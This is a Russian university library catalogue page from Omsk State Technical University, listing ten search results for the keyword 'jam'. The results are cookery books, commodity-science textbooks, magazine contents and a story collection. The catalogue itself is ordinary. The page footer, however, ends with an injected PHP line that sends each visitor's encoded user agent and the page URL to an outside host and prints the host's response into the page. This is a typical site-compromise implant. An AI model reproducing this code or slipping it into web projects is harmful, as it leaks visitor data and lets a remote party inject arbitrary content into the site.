Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

80 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ВАРЕНЬЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 10
1. 
Табаторович, Александр Николаевич. Товароведение однородных групп продовольственных товаров (зерномучные и кондитерские товары) [Текст] / А. Н. Табаторович ; дар. А. Н. Табаторович, 2017. - 183 с.
Ключевые слова 
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии рассмотрены вопросы терминологии, классификации, пищевой ценности, формирования и оценки качества основных видов и разновидностей зерномучных и кондитерских товаров. Классификация ассортимента, показатели качества и безопасности представлены в соответствии с действующими нормативными документами и Техническими регламентами Таможенного союза.

Пособие предназначено для студентов, обучающихся по направлениям подготовки 38.03.07 "Товароведение" и 38.03.06 "Торговое дело". Может быть полезно для товароведов-экспертов, коммерсантов и других практических работников, чья деятельность связана с производством, продажей и хранением указанных групп товаров.

Полный текст
2. 
Медкова, Ирина Львовна. Сюрпризы вегетарианского стола [Текст] / И. Л. Медкова, Т. Н. Павлова, 1994. - 236, [1] с.
Держатели документа (Информация об экземплярах) 
3. 
Питание и общество. - Журнал, 2010г. № 12
Оглавление 
  • Абрикосовый пудинг. - с.5
  • Варенье из апельсинов. - с.5
  • Натуральные органик-продукты. - с.8-9
  • Кучер, Л. Искусство ведения переговоров / Л. Кучер, Л. Шкуратова. - с.14-15
  • Сальков, Петр. Кабан в луковом соусе по-охотничьи / П. Сальков. - с.15
  • Забнев, Сергей. Кофе по-американски / С. Забнев. - с.16
  • Кашев, Анатолий Александрович. Русский салат с иностранным именем / А. А. Кашев. - с.17
  • Сучкова, Елена. "Карамельный кот" / Е. Сучкова. - с.18-19
  • Суворов, Роман. "Хрустящий батискаф для подводной братвы" / Р. Суворов. - с.20
  • Филонов, Михаил. "Суп - это улыбка хозяйки" / М. Филонов. - с.20-21
  • Самойлов, Юрий. Приготовила Айсият Койтемирова / Ю. Самойлов. - с.22-23
  • Арефьева, Елена. Печем румяные, ароматные пирожки, как у бабушки / Е. Арефьева. - с.24
  • Арефьева, Анастасия. Десерт по-японски / А. Арефьева. - с.25
  • Амирасланов, Тахир. Дастан о пастушьей басдырме / Т. Амирасланов. - с.26-28
  • Арефьева, Елена. Сказ о пельмене / Е. Арефьева, А. Арефьева. - с.28-29
  • Арефьева, Анастасия. Иссоп обыкновенный / А. Арефьева. - с.30
  • Поросенок, жаренный на вертеле
4. 
Смена. - Журнал, 2010г. № 12
Оглавление 
  • Болтовский, Лев. Осторожно, мамонт! / Л. Болтовский. - с.10
  • Пыхова, Наталья. Кубок Рубика / Н. Пыхова. - с.11
  • Добрянская, Александра. Сирота-невеста / А. Добрянская. - с.12-15
  • Крузенштерн, Евгений. [Вестник культурной столицы] / Е. Крузенштерн
  • Аронов, Никита. Обрыв контакта / Н. Аронов. - с.20-22
  • Петрова, Валентина. Заводи бензорез / В. Петрова. - с.24
  • Елин, Антон. Супервайзер оф Москоу / А. Елин. - с.30-31
  • Крузенштерн, Евгений. Затрудняюсь ответить / Е. Крузенштерн. - с.32
  • Недогле, Анатолий. Десять музык / А. Недогле. - с.34
  • Романова, Александра. Соседи снизу / А. Романова. - с.35-37
  • Ландер, Виктор. Варенье с лимоном / В. Ландер. - с.48
  • Романова, Александра. Кебаб Live, часть первая / А. Романова. - с.49
  • Нгоо, Алексей. Ложный шницель / А. Нгоо. - с.50-51
  • Ромендик, Дмитрий. Огурец позвал в дорогу / Д. Ромендик. - с.52-55
  • Тимошкина, Ксения. Сберегательный пакет / К. Тимошкина. - с.58-59
  • Генрих, Александра. Сорри, Монтессори / А. Генрих. - с.61-63
  • Аронов, Никита. Чип спешит на помощь / Н. Аронов. - с.64-68
  • Мартемьянов, М. Орел двуглавый натюрель / М. Мартемьянов. - с.69
  • Елин, Антон. Здесь был Эдичка / А. Елин. - с.72-76
  • Деменкова, А. Острова / А. Деменкова. - с.78-87
  • Тимошкина, Ксения. Физическая биография / К. Тимошкина. - с.88
  • Цветков, Алексей. Брат Морозного / А. Цветков. - с.90-95
5. 
Большая энциклопедия дома и семьи. В 2 т. Т.1. Семья. Жилище. Ребенок. Питание. Здоровье, спорт, отдых. Одежда, обувь, индивидуальный стиль [Текст] : энциклопедия, 2000. - 479 с.
6. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

7. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ
8. 
Глебова, Екатерина Ильинична. Ягодный сад [Текст] / Е. И. Глебова, В. В. Даньков, М. М. Скрипниченко, 1990. - 206, [2] с.
Держатели документа (Информация об экземплярах) 
9. 
Улицкая, Людмила Евгеньевна. Русское варенье и другое [Текст] / Людмила Улицкая, 2008. - 254, [1] с.
Ключевые слова 
Оглавление 
  • Семеро святых из деревни Брюхо. - с.5-74
  • Русское варенье. - с.75-190
  • Мой внук Вениамин. - с.191-254
10. 
Даниленко, Михаил Павлович. Как приготовить дома кондитерские и другие изделия из муки, сладкие блюда, варенье, соки [Текст] : пособие для молодых хозяек / М. П. Даниленко, 1965. - 181, [2] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3218 - 01.04.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.90 с.16 запросов, 0.67c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;